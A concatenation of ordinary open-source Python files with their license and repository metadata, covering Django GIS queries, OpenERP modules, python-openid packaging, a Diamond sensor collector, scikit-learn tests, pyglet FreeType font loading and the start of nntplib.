    'bbcontains', 'bboverlaps', 'contained', 'contains',
    'contains_properly', 'coveredby', 'covers', 'crosses', 'disjoint',
    'distance_gt', 'distance_gte', 'distance_lt', 'distance_lte',
    'dwithin', 'equals', 'exact',
    'intersects', 'overlaps', 'relate', 'same_as', 'touches', 'within',
    'left', 'right', 'overlaps_left', 'overlaps_right',
    'overlaps_above', 'overlaps_below',
    'strictly_above', 'strictly_below'
))
ALL_TERMS.update(sql.constants.QUERY_TERMS)
class GeoQuery(sql.Query):
    """
    A single spatial SQL query.

    Extends the base ORM Query with per-query state used by GeoQuerySet:
    custom selection SQL, a transformed-SRID flag, and extra select fields
    used to post-process spatial function output.
    """
    # Overriding the valid query terms.
    query_terms = ALL_TERMS
    aggregates_module = gis_aggregates

    compiler = 'GeoSQLCompiler'

    #### Methods overridden from the base Query class ####
    def __init__(self, model, where=GeoWhereNode):
        super(GeoQuery, self).__init__(model, where)
        # The following attributes are customized for the GeoQuerySet.
        # The GeoWhereNode and SpatialBackend classes contain backend-specific
        # routines and functions.
        self.custom_select = {}
        self.transformed_srid = None
        self.extra_select_fields = {}

    def clone(self, *args, **kwargs):
        obj = super(GeoQuery, self).clone(*args, **kwargs)
        # Customized selection dictionary and transformed srid flag have
        # to also be added to obj.  (Shallow copies: the contained field
        # objects are shared with the original query.)
        obj.custom_select = self.custom_select.copy()
        obj.transformed_srid = self.transformed_srid
        obj.extra_select_fields = self.extra_select_fields.copy()
        return obj

    def convert_values(self, value, field, connection):
        """
        Using the same routines that Oracle does we can convert our
        extra selection objects into Geometry and Distance objects.
        TODO: Make converted objects 'lazy' for less overhead.
        """
        if connection.ops.oracle:
            # Running through Oracle's first.
            value = super(GeoQuery, self).convert_values(value, field or GeomField(), connection)
        if value is None:
            # Output from spatial function is NULL (e.g., called
            # function on a geometry field with NULL value).
            pass
        elif isinstance(field, DistanceField):
            # Using the field's distance attribute, can instantiate
            # `Distance` with the right context.
            value = Distance(**{field.distance_att : value})
        elif isinstance(field, AreaField):
            value = Area(**{field.area_att : value})
        elif isinstance(field, (GeomField, GeometryField)) and value:
            value = Geometry(value)
        return value

    def get_aggregation(self, using):
        # Remove any aggregates marked for reduction from the subquery
        # and move them to the outer AggregateQuery.
        connection = connections[using]
        for alias, aggregate in self.aggregate_select.items():
            if isinstance(aggregate, gis_aggregates.GeoAggregate):
                if not getattr(aggregate, 'is_extent', False) or connection.ops.oracle:
                    self.extra_select_fields[alias] = GeomField()
        return super(GeoQuery, self).get_aggregation(using)

    def resolve_aggregate(self, value, aggregate, connection):
        """
        Overridden from GeoQuery's normalize to handle the conversion of
        GeoAggregate objects (extents and geometry-returning aggregates).
        """
        if isinstance(aggregate, self.aggregates_module.GeoAggregate):
            if aggregate.is_extent:
                if aggregate.is_extent == '3D':
                    return connection.ops.convert_extent3d(value)
                else:
                    return connection.ops.convert_extent(value)
            else:
                return connection.ops.convert_geom(value, aggregate.source)
        else:
            return super(GeoQuery, self).resolve_aggregate(value, aggregate, connection)

    # Private API utilities, subject to change.
    def _geo_field(self, field_name=None):
        """
        Returns the first Geometry field encountered; or specified via the
        `field_name` keyword.  The `field_name` may be a string specifying
        the geometry field on this GeoQuery's model, or a lookup string
        to a geometry field via a ForeignKey relation.  Returns False when
        no geometry field can be found.
        """
        if field_name is None:
            # Incrementing until the first geographic field is found.
            for fld in self.model._meta.fields:
                if isinstance(fld, GeometryField): return fld
            return False
        else:
            # Otherwise, check by the given field name -- which may be
            # a lookup to a _related_ geographic field.
            return GeoWhereNode._check_geo_field(self.model._meta, field_name)
|
bsd-3-clause
|
miipl-naveen/optibizz
|
addons/stock_picking_wave/wizard/picking_to_wave.py
|
382
|
1624
|
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class stock_picking_to_wave(osv.osv_memory):
    """Wizard: attach the currently selected pickings to a picking wave."""
    _name = 'stock.picking.to.wave'
    _description = 'Add pickings to a picking wave'
    _columns = {
        'wave_id': fields.many2one('stock.picking.wave', 'Picking Wave', required=True),
    }

    def attach_pickings(self, cr, uid, ids, context=None):
        # use active_ids to add picking line to the selected wave
        # NOTE(review): context.get() assumes the wizard is launched from a
        # list view that supplies a context; context=None would crash here.
        wave_id = self.browse(cr, uid, ids, context=context)[0].wave_id.id
        picking_ids = context.get('active_ids', False)
        return self.pool.get('stock.picking').write(cr, uid, picking_ids, {'wave_id': wave_id})
|
agpl-3.0
|
keedio/hue
|
desktop/core/ext-py/python-openid-2.2.5/setup.py
|
56
|
1682
|
import sys
import os
from distutils.core import setup
# Building a source distribution regenerates the documentation first.
# NOTE(review): os.system with a fixed relative path assumes the CWD is the
# project root; acceptable for a developer-run setup.py.
if 'sdist' in sys.argv:
    os.system('./admin/makedoc')

# The version is kept inside a tagged literal so release tooling can rewrite
# it in place; the slice strips "[library version:" and the trailing "]".
version = '[library version:2.2.5]'[17:-1]

setup(
    name='python-openid',
    version=version,
    description='OpenID support for servers and consumers.',
    long_description='''This is a set of Python packages to support use of
the OpenID decentralized identity system in your application.  Want to enable
single sign-on for your web site?  Use the openid.consumer package.  Want to
run your own OpenID server? Check out openid.server.  Includes example code
and support for a variety of storage back-ends.''',
    url='http://github.com/openid/python-openid',
    packages=['openid',
              'openid.consumer',
              'openid.server',
              'openid.store',
              'openid.yadis',
              'openid.extensions',
              'openid.extensions.draft',
              ],
    # license specified by classifier.
    # license=getLicense(),
    author='JanRain',
    author_email='[email protected]',
    download_url='http://github.com/openid/python-openid/tarball/%s' % (version,),
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Environment :: Web Environment",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: Apache Software License",
        "Operating System :: POSIX",
        "Programming Language :: Python",
        "Topic :: Internet :: WWW/HTTP",
        "Topic :: Internet :: WWW/HTTP :: Dynamic Content :: CGI Tools/Libraries",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: System :: Systems Administration :: Authentication/Directory",
        ],
    )
|
apache-2.0
|
numerigraphe/stock-logistics-warehouse
|
__unported__/stock_available_immediately/__openerp__.py
|
5
|
1363
|
# -*- coding: utf-8 -*-
#
#
# Author: Guewen Baconnier
# Copyright 2010-2012 Camptocamp SA
# Copyright (C) 2011 Akretion Sébastien BEAU <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
{
"name": "Immediately Usable Stock Quantity",
"version": "1.0",
"depends": ["product", "stock", ],
"author": "Camptocamp",
"license": "AGPL-3",
"description": """
Compute the immediately usable stock.
Immediately usable is computed : Quantity on Hand - Outgoing Stock.
""",
"website": "http://tinyerp.com/module_account.html",
"category": "Generic Modules/Stock",
"data": ["product_view.xml",
],
"active": False,
'installable': False
}
|
agpl-3.0
|
acquia/Diamond
|
src/collectors/onewire/onewire.py
|
53
|
2416
|
# coding=utf-8
"""
The OneWireCollector collects data from 1-Wire Filesystem
You can configure which sensors are read in two way:
- add section [scan] with attributes and aliases,
(collector will scan owfs to find attributes)
or
- add sections with format id:$SENSOR_ID
See also: http://owfs.org/
Author: Tomasz Prus
#### Dependencies
* owfs
"""
import os
import diamond.collector
class OneWireCollector(diamond.collector.Collector):
    """
    Collects metrics from sensors exposed through the 1-Wire filesystem
    (owfs).  Sensors are selected either by a [scan] config section or by
    explicit "id:<sensor-id>" sections.
    """

    def get_default_config_help(self):
        config_help = super(OneWireCollector, self).get_default_config_help()
        config_help.update({
        })
        return config_help

    def get_default_config(self):
        """
        Returns the default collector settings
        """
        config = super(OneWireCollector, self).get_default_config()
        config.update({
            'path': 'owfs',
            'owfs': '/mnt/1wire',
            # 'scan': {'temperature': 't'},
            # 'id:24.BB000000': {'file_with_value': 'alias'},
        })
        return config

    def collect(self):
        """
        Overrides the Collector.collect method
        """
        metrics = {}

        if 'scan' in self.config:
            # sensor directories contain a '.' (family.id), e.g. "28.ABC..."
            for entry in os.listdir(self.config['owfs']):
                if '.' in entry:
                    self.read_values(entry, self.config['scan'], metrics)

        # items() instead of iteritems() keeps this working on Python 2 and 3
        for oid, files in self.config.items():
            if oid[:3] == 'id:':
                self.read_values(oid[3:], files, metrics)

        for name, value in metrics.items():
            self.publish(name, value, 2)

    def read_values(self, oid, files, metrics):
        """
        Reads values from owfs/oid/{files} and updates
        metrics with format [oid.alias] = value
        """
        oid_path = os.path.join(self.config['owfs'], oid)
        oid = oid.replace('.', '_')

        for fn, alias in files.items():
            fv = os.path.join(oid_path, fn)
            if os.path.isfile(fv):
                try:
                    # with-statement closes the file even if read() raises
                    # (the old open/read/close leaked the handle on error);
                    # except Exception (not bare except) no longer swallows
                    # KeyboardInterrupt/SystemExit before re-raising.
                    with open(fv) as f:
                        v = f.read()
                except Exception:
                    self.log.error("Unable to read %s", fv)
                    raise
                try:
                    v = float(v)
                except ValueError:
                    self.log.error("Unexpected value %s in %s", v, fv)
                    raise
                metrics["%s.%s" % (oid, alias)] = v
|
mit
|
LiaoPan/scikit-learn
|
sklearn/neighbors/tests/test_nearest_centroid.py
|
305
|
4121
|
"""
Testing for the nearest centroid module.
"""
import numpy as np
from scipy import sparse as sp
from numpy.testing import assert_array_equal
from numpy.testing import assert_equal
from sklearn.neighbors import NearestCentroid
from sklearn import datasets
from sklearn.metrics.pairwise import pairwise_distances
# toy sample
# toy sample: two well-separated classes in 2-D
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
X_csr = sp.csr_matrix(X)  # Sparse matrix
y = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
T_csr = sp.csr_matrix(T)
true_result = [-1, 1, 1]

# also load the iris dataset
# and randomly permute it (fixed seed for reproducible test runs)
iris = datasets.load_iris()
rng = np.random.RandomState(1)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
def test_classification_toy():
    """Check classification on a toy dataset, including sparse versions."""
    clf = NearestCentroid()
    clf.fit(X, y)
    assert_array_equal(clf.predict(T), true_result)

    # Same test, but with a sparse matrix to fit and test.
    clf = NearestCentroid()
    clf.fit(X_csr, y)
    assert_array_equal(clf.predict(T_csr), true_result)

    # Fit with sparse, test with non-sparse
    clf = NearestCentroid()
    clf.fit(X_csr, y)
    assert_array_equal(clf.predict(T), true_result)

    # Fit with non-sparse, test with sparse
    clf = NearestCentroid()
    clf.fit(X, y)
    assert_array_equal(clf.predict(T_csr), true_result)

    # Fit and predict with non-CSR sparse matrices
    clf = NearestCentroid()
    clf.fit(X_csr.tocoo(), y)
    assert_array_equal(clf.predict(T_csr.tolil()), true_result)
def test_precomputed():
    """Check the 'precomputed' metric: predict from a distance matrix."""
    clf = NearestCentroid(metric="precomputed")
    clf.fit(X, y)
    S = pairwise_distances(T, clf.centroids_)
    assert_array_equal(clf.predict(S), true_result)
def test_iris():
    """Check consistency on dataset iris."""
    for metric in ('euclidean', 'cosine'):
        clf = NearestCentroid(metric=metric).fit(iris.data, iris.target)
        score = np.mean(clf.predict(iris.data) == iris.target)
        assert score > 0.9, "Failed with score = " + str(score)
def test_iris_shrinkage():
    """Check consistency on dataset iris, when using shrinkage."""
    for metric in ('euclidean', 'cosine'):
        for shrink_threshold in [None, 0.1, 0.5]:
            clf = NearestCentroid(metric=metric,
                                  shrink_threshold=shrink_threshold)
            clf = clf.fit(iris.data, iris.target)
            score = np.mean(clf.predict(iris.data) == iris.target)
            assert score > 0.8, "Failed with score = " + str(score)
def test_pickle():
    """Check that a fitted classifier round-trips through pickle unchanged."""
    import pickle

    # classification
    obj = NearestCentroid()
    obj.fit(iris.data, iris.target)
    score = obj.score(iris.data, iris.target)
    s = pickle.dumps(obj)
    obj2 = pickle.loads(s)
    assert_equal(type(obj2), obj.__class__)
    score2 = obj2.score(iris.data, iris.target)
    assert_array_equal(score, score2,
                       "Failed to generate same score"
                       " after pickling (classification).")
def test_shrinkage_threshold_decoded_y():
    """Shrinkage must give the same centroids whether labels are -1/1 or 0/1."""
    clf = NearestCentroid(shrink_threshold=0.01)
    y_ind = np.asarray(y)
    y_ind[y_ind == -1] = 0
    clf.fit(X, y_ind)
    centroid_encoded = clf.centroids_
    clf.fit(X, y)
    assert_array_equal(centroid_encoded, clf.centroids_)
def test_predict_translated_data():
    """Test that NearestCentroid gives same results on translated data."""
    rng = np.random.RandomState(0)
    X = rng.rand(50, 50)
    y = rng.randint(0, 3, 50)
    noise = rng.rand(50)
    clf = NearestCentroid(shrink_threshold=0.1)
    clf.fit(X, y)
    y_init = clf.predict(X)
    clf = NearestCentroid(shrink_threshold=0.1)
    # translate every sample by the same per-feature offset
    X_noise = X + noise
    clf.fit(X_noise, y)
    y_translate = clf.predict(X_noise)
    assert_array_equal(y_init, y_translate)
def test_manhattan_metric():
    """Test the manhattan metric: dense and sparse fits agree (medians)."""
    clf = NearestCentroid(metric='manhattan')
    clf.fit(X, y)
    dense_centroid = clf.centroids_
    clf.fit(X_csr, y)
    assert_array_equal(clf.centroids_, dense_centroid)
    assert_array_equal(dense_centroid, [[-1, -1], [1, 1]])
|
bsd-3-clause
|
jpaalasm/pyglet
|
pyglet/font/freetype.py
|
26
|
13163
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import ctypes
from ctypes import *
from warnings import warn
import pyglet.lib
from pyglet.font import base
from pyglet import image
from pyglet.font.freetype_lib import *
from pyglet.compat import asbytes
# fontconfig library definitions
fontconfig = pyglet.lib.load_library('fontconfig')
FcResult = c_int
fontconfig.FcPatternBuild.restype = c_void_p
fontconfig.FcPatternCreate.restype = c_void_p
fontconfig.FcFontMatch.restype = c_void_p
fontconfig.FcFreeTypeCharIndex.restype = c_uint
fontconfig.FcPatternAddDouble.argtypes = [c_void_p, c_char_p, c_double]
fontconfig.FcPatternAddInteger.argtypes = [c_void_p, c_char_p, c_int]
fontconfig.FcPatternAddString.argtypes = [c_void_p, c_char_p, c_char_p]
fontconfig.FcConfigSubstitute.argtypes = [c_void_p, c_void_p, c_int]
fontconfig.FcDefaultSubstitute.argtypes = [c_void_p]
fontconfig.FcFontMatch.argtypes = [c_void_p, c_void_p, c_void_p]
fontconfig.FcPatternDestroy.argtypes = [c_void_p]
fontconfig.FcPatternGetFTFace.argtypes = [c_void_p, c_char_p, c_int, c_void_p]
fontconfig.FcPatternGet.argtypes = [c_void_p, c_char_p, c_int, c_void_p]
FC_FAMILY = asbytes('family')
FC_SIZE = asbytes('size')
FC_SLANT = asbytes('slant')
FC_WEIGHT = asbytes('weight')
FC_FT_FACE = asbytes('ftface')
FC_FILE = asbytes('file')
FC_WEIGHT_REGULAR = 80
FC_WEIGHT_BOLD = 200
FC_SLANT_ROMAN = 0
FC_SLANT_ITALIC = 100
FT_STYLE_FLAG_ITALIC = 1
FT_STYLE_FLAG_BOLD = 2
(FT_RENDER_MODE_NORMAL,
FT_RENDER_MODE_LIGHT,
FT_RENDER_MODE_MONO,
FT_RENDER_MODE_LCD,
FT_RENDER_MODE_LCD_V) = range(5)
def FT_LOAD_TARGET_(x):
    """Pack a render-mode constant into bits 16..19 of an FT_LOAD flag word."""
    return (x & 0xF) << 16
FT_LOAD_TARGET_NORMAL = FT_LOAD_TARGET_(FT_RENDER_MODE_NORMAL)
FT_LOAD_TARGET_LIGHT = FT_LOAD_TARGET_(FT_RENDER_MODE_LIGHT)
FT_LOAD_TARGET_MONO = FT_LOAD_TARGET_(FT_RENDER_MODE_MONO)
FT_LOAD_TARGET_LCD = FT_LOAD_TARGET_(FT_RENDER_MODE_LCD)
FT_LOAD_TARGET_LCD_V = FT_LOAD_TARGET_(FT_RENDER_MODE_LCD_V)
(FT_PIXEL_MODE_NONE,
FT_PIXEL_MODE_MONO,
FT_PIXEL_MODE_GRAY,
FT_PIXEL_MODE_GRAY2,
FT_PIXEL_MODE_GRAY4,
FT_PIXEL_MODE_LCD,
FT_PIXEL_MODE_LCD_V) = range(7)
(FcTypeVoid,
FcTypeInteger,
FcTypeDouble,
FcTypeString,
FcTypeBool,
FcTypeMatrix,
FcTypeCharSet,
FcTypeFTFace,
FcTypeLangSet) = range(9)
FcType = c_int
(FcMatchPattern,
FcMatchFont) = range(2)
FcMatchKind = c_int
class _FcValueUnion(Union):
    # Payload of a fontconfig FcValue.  Only one member is meaningful at a
    # time; the accompanying FcType tag in FcValue selects which one.
    _fields_ = [
        ('s', c_char_p),    # FcTypeString
        ('i', c_int),       # FcTypeInteger
        ('b', c_int),       # FcTypeBool
        ('d', c_double),    # FcTypeDouble
        ('m', c_void_p),    # FcTypeMatrix
        ('c', c_void_p),    # FcTypeCharSet
        ('f', c_void_p),    # FcTypeFTFace
        ('p', c_void_p),    # opaque pointer
        ('l', c_void_p),    # FcTypeLangSet
    ]
class FcValue(Structure):
    # Tagged union filled in by fontconfig.FcPatternGet: 'type' says which
    # member of the union 'u' carries the value.
    _fields_ = [
        ('type', FcType),
        ('u', _FcValueUnion)
    ]
# End of library definitions
def f16p16_to_float(value):
    """Convert a FreeType 16.16 fixed-point value to a float."""
    return value / float(1 << 16)
def float_to_f16p16(value):
    """Convert a float to FreeType 16.16 fixed-point (truncates toward zero)."""
    scaled = value * (1 << 16)
    return int(scaled)
def f26p6_to_float(value):
    """Convert a FreeType 26.6 fixed-point value to a float."""
    return value / float(1 << 6)
def float_to_f26p6(value):
    """Convert a float to FreeType 26.6 fixed-point (truncates toward zero)."""
    scaled = value * (1 << 6)
    return int(scaled)
class FreeTypeGlyphRenderer(base.GlyphRenderer):
    """Renders individual glyphs for a FreeTypeFont via the FreeType library."""
    def __init__(self, font):
        super(FreeTypeGlyphRenderer, self).__init__(font)
        self.font = font
    def render(self, text):
        """Render the first character of `text` and return a textured glyph.

        Raises base.FontException if the glyph cannot be loaded or its
        bitmap uses an unsupported pixel mode.
        """
        face = self.font.face
        FT_Set_Char_Size(face, 0, self.font._face_size,
                         self.font._dpi, self.font._dpi)
        glyph_index = fontconfig.FcFreeTypeCharIndex(byref(face), ord(text[0]))
        error = FT_Load_Glyph(face, glyph_index, FT_LOAD_RENDER)
        if error != 0:
            raise base.FontException(
                'Could not load glyph for "%c"' % text[0], error)
        glyph_slot = face.glyph.contents
        width = glyph_slot.bitmap.width
        height = glyph_slot.bitmap.rows
        baseline = height - glyph_slot.bitmap_top
        lsb = glyph_slot.bitmap_left
        advance = int(f26p6_to_float(glyph_slot.advance.x))
        mode = glyph_slot.bitmap.pixel_mode
        pitch = glyph_slot.bitmap.pitch
        if mode == FT_PIXEL_MODE_MONO:
            # BCF fonts always render to 1 bit mono, regardless of render
            # flags. (freetype 2.3.5)
            # Expand each packed 1-bit pixel into a full 0/255 alpha byte.
            bitmap_data = cast(glyph_slot.bitmap.buffer,
                               POINTER(c_ubyte * (pitch * height))).contents
            data = (c_ubyte * (pitch * 8 * height))()
            data_i = 0
            for byte in bitmap_data:
                # Data is MSB; left-most pixel in a byte has value 128.
                data[data_i + 0] = (byte & 0x80) and 255 or 0
                data[data_i + 1] = (byte & 0x40) and 255 or 0
                data[data_i + 2] = (byte & 0x20) and 255 or 0
                data[data_i + 3] = (byte & 0x10) and 255 or 0
                data[data_i + 4] = (byte & 0x08) and 255 or 0
                data[data_i + 5] = (byte & 0x04) and 255 or 0
                data[data_i + 6] = (byte & 0x02) and 255 or 0
                data[data_i + 7] = (byte & 0x01) and 255 or 0
                data_i += 8
            pitch <<= 3  # pitch is now in expanded 1-byte-per-pixel units
        elif mode == FT_PIXEL_MODE_GRAY:
            # Usual case
            data = glyph_slot.bitmap.buffer
        else:
            raise base.FontException('Unsupported render mode for this glyph')
        # pitch should be negative, but much faster to just swap tex_coords
        img = image.ImageData(width, height, 'A', data, pitch)
        glyph = self.font.create_glyph(img)
        glyph.set_bearings(baseline, lsb, advance)
        t = list(glyph.tex_coords)
        # Swap top and bottom texture rows to flip the glyph vertically
        # instead of negating pitch (see comment above).
        glyph.tex_coords = t[9:12] + t[6:9] + t[3:6] + t[:3]
        return glyph
class FreeTypeMemoryFont(object):
    """Wraps an FT_Face created from raw font data held in memory."""
    def __init__(self, data):
        # Copy the data into a ctypes buffer stored on self, so the memory
        # stays alive for as long as the FT_Face created from it.
        self.buffer = (ctypes.c_byte * len(data))()
        ctypes.memmove(self.buffer, data, len(data))
        ft_library = ft_get_library()
        self.face = FT_Face()
        r = FT_New_Memory_Face(ft_library,
            self.buffer, len(self.buffer), 0, self.face)
        if r != 0:
            raise base.FontException('Could not load font data')
        self.name = self.face.contents.family_name
        self.bold = self.face.contents.style_flags & FT_STYLE_FLAG_BOLD != 0
        self.italic = self.face.contents.style_flags & FT_STYLE_FLAG_ITALIC != 0
        # Replace Freetype's generic family name with TTF/OpenType specific
        # name if we can find one; there are some instances where Freetype
        # gets it wrong.
        if self.face.contents.face_flags & FT_FACE_FLAG_SFNT:
            name = FT_SfntName()
            for i in range(FT_Get_Sfnt_Name_Count(self.face)):
                result = FT_Get_Sfnt_Name(self.face, i, name)
                if result != 0:
                    continue
                # Only use the Microsoft-platform Unicode name table entry.
                if not (name.platform_id == TT_PLATFORM_MICROSOFT and
                        name.encoding_id == TT_MS_ID_UNICODE_CS):
                    continue
                if name.name_id == TT_NAME_ID_FONT_FAMILY:
                    string = string_at(name.string, name.string_len)
                    self.name = string.decode('utf-16be', 'ignore')
    def __del__(self):
        # Best-effort release of the FT_Face; errors during interpreter
        # shutdown are deliberately ignored.
        try:
            FT_Done_Face(self.face)
        except:
            pass
class FreeTypeFont(base.Font):
    """A font face backed by FreeType, matched through fontconfig.

    Lookup order: fonts registered in memory via add_font_data() are
    preferred; otherwise fontconfig matches (or substitutes) a system
    font by family name, weight and slant.
    """
    glyph_renderer_class = FreeTypeGlyphRenderer

    # Map font (name, bold, italic) to FreeTypeMemoryFont
    _memory_fonts = {}

    def __init__(self, name, size, bold=False, italic=False, dpi=None):
        super(FreeTypeFont, self).__init__()
        if dpi is None:
            dpi = 96  # as of pyglet 1.1; pyglet 1.0 had 72.

        # Check if font name/style matches a font loaded into memory by user
        lname = name and name.lower() or ''
        if (lname, bold, italic) in self._memory_fonts:
            font = self._memory_fonts[lname, bold, italic]
            self._set_face(font.face, size, dpi)
            return

        # Use fontconfig to match the font (or substitute a default).
        ft_library = ft_get_library()
        match = self.get_fontconfig_match(name, size, bold, italic)
        if not match:
            raise base.FontException('Could not match font "%s"' % name)
        f = FT_Face()
        if fontconfig.FcPatternGetFTFace(match, FC_FT_FACE, 0, byref(f)) != 0:
            # The pattern carries no already-open FT_Face; fall back to
            # loading the face from the matched filename.
            value = FcValue()
            result = fontconfig.FcPatternGet(match, FC_FILE, 0, byref(value))
            if result != 0:
                raise base.FontException('No filename or FT face for "%s"' %
                                         name)
            result = FT_New_Face(ft_library, value.u.s, 0, byref(f))
            if result:
                raise base.FontException('Could not load "%s": %d' %
                                         (name, result))
        fontconfig.FcPatternDestroy(match)
        self._set_face(f, size, dpi)

    def _set_face(self, face, size, dpi):
        """Select `face` at `size` points / `dpi`, and cache ascent/descent."""
        self.face = face.contents
        self._face_size = float_to_f26p6(size)
        self._dpi = dpi
        FT_Set_Char_Size(self.face, 0, float_to_f26p6(size), dpi, dpi)
        metrics = self.face.size.contents.metrics
        if metrics.ascender == 0 and metrics.descender == 0:
            # Workaround broken fonts with no metrics.  Has been observed with
            # courR12-ISO8859-1.pcf.gz: "Courier" "Regular"
            #
            # None of the metrics fields are filled in, so render a glyph and
            # grab its height as the ascent, and make up an arbitrary
            # descent.
            i = fontconfig.FcFreeTypeCharIndex(byref(self.face), ord('X'))
            FT_Load_Glyph(self.face, i, FT_LOAD_RENDER)
            self.ascent = self.face.available_sizes.contents.height
            self.descent = -self.ascent // 4  # arbitrary.
        else:
            self.ascent = int(f26p6_to_float(metrics.ascender))
            self.descent = int(f26p6_to_float(metrics.descender))

    @staticmethod
    def get_fontconfig_match(name, size, bold, italic):
        """Build and match a fontconfig pattern for the requested face.

        `bold` and `italic` are booleans.  fontconfig may substitute a
        default face, so a non-None return does not guarantee an exact
        family match.
        """
        if bold:
            bold = FC_WEIGHT_BOLD
        else:
            bold = FC_WEIGHT_REGULAR
        if italic:
            italic = FC_SLANT_ITALIC
        else:
            italic = FC_SLANT_ROMAN
        fontconfig.FcInit()
        if isinstance(name, unicode):
            name = name.encode('utf8')
        pattern = fontconfig.FcPatternCreate()
        fontconfig.FcPatternAddDouble(pattern, FC_SIZE, c_double(size))
        fontconfig.FcPatternAddInteger(pattern, FC_WEIGHT, bold)
        fontconfig.FcPatternAddInteger(pattern, FC_SLANT, italic)
        fontconfig.FcPatternAddString(pattern, FC_FAMILY, name)
        fontconfig.FcConfigSubstitute(0, pattern, FcMatchPattern)
        fontconfig.FcDefaultSubstitute(pattern)

        # Look for a font that matches pattern
        result = FcResult()
        match = fontconfig.FcFontMatch(0, pattern, byref(result))
        fontconfig.FcPatternDestroy(pattern)
        return match

    @classmethod
    def have_font(cls, name):
        """Return True if `name` is available via fontconfig or was
        registered with add_font_data()."""
        value = FcValue()
        match = cls.get_fontconfig_match(name, 12, False, False)
        # Bug fix: this FcPatternGet call was commented out, leaving
        # value.u.s unset so the comparison below could never match a
        # system font -- only memory fonts were ever reported available.
        result = fontconfig.FcPatternGet(match, FC_FAMILY, 0, byref(value))
        if value.u.s == name:
            return True
        else:
            # Fall back to fonts loaded with add_font_data().
            name = name.lower()
            for font in cls._memory_fonts.values():
                if font.name.lower() == name:
                    return True
        return False

    @classmethod
    def add_font_data(cls, data):
        """Register raw font data so later lookups by family name find it."""
        font = FreeTypeMemoryFont(data)
        cls._memory_fonts[font.name.lower(), font.bold, font.italic] = font
|
bsd-3-clause
|
HiSPARC/station-software
|
user/python/Lib/nntplib.py
|
92
|
21470
|
"""An NNTP client class based on RFC 977: Network News Transfer Protocol.
Example:
>>> from nntplib import NNTP
>>> s = NNTP('news')
>>> resp, count, first, last, name = s.group('comp.lang.python')
>>> print 'Group', name, 'has', count, 'articles, range', first, 'to', last
Group comp.lang.python has 51 articles, range 5770 to 5821
>>> resp, subs = s.xhdr('subject', first + '-' + last)
>>> resp = s.quit()
>>>
Here 'resp' is the server response line.
Error responses are turned into exceptions.
To post an article from a file:
>>> f = open(filename, 'r') # file containing article, including header
>>> resp = s.post(f)
>>>
For descriptions of all methods, read the comments in the code below.
Note that all arguments and return values representing article numbers
are strings, not numbers, since they are rarely used for calculations.
"""
# RFC 977 by Brian Kantor and Phil Lapsley.
# xover, xgtitle, xpath, date methods by Kevan Heydon
# Imports
import re
import socket
__all__ = ["NNTP","NNTPReplyError","NNTPTemporaryError",
"NNTPPermanentError","NNTPProtocolError","NNTPDataError",
"error_reply","error_temp","error_perm","error_proto",
"error_data",]
# maximal line length when calling readline(). This is to prevent
# reading arbitrary length lines. RFC 3977 limits NNTP line length to
# 512 characters, including CRLF. We have selected 2048 just to be on
# the safe side.
_MAXLINE = 2048
# Exceptions raised when an error or invalid response is received
class NNTPError(Exception):
    """Base class for all nntplib exceptions"""
    def __init__(self, *args):
        Exception.__init__(self, *args)
        # Keep the first positional argument (the raw server response
        # line) available as .response for callers that inspect it.
        if args:
            self.response = args[0]
        else:
            self.response = 'No response given'
class NNTPReplyError(NNTPError):
    """Unexpected [123]xx reply received from the server"""
    pass
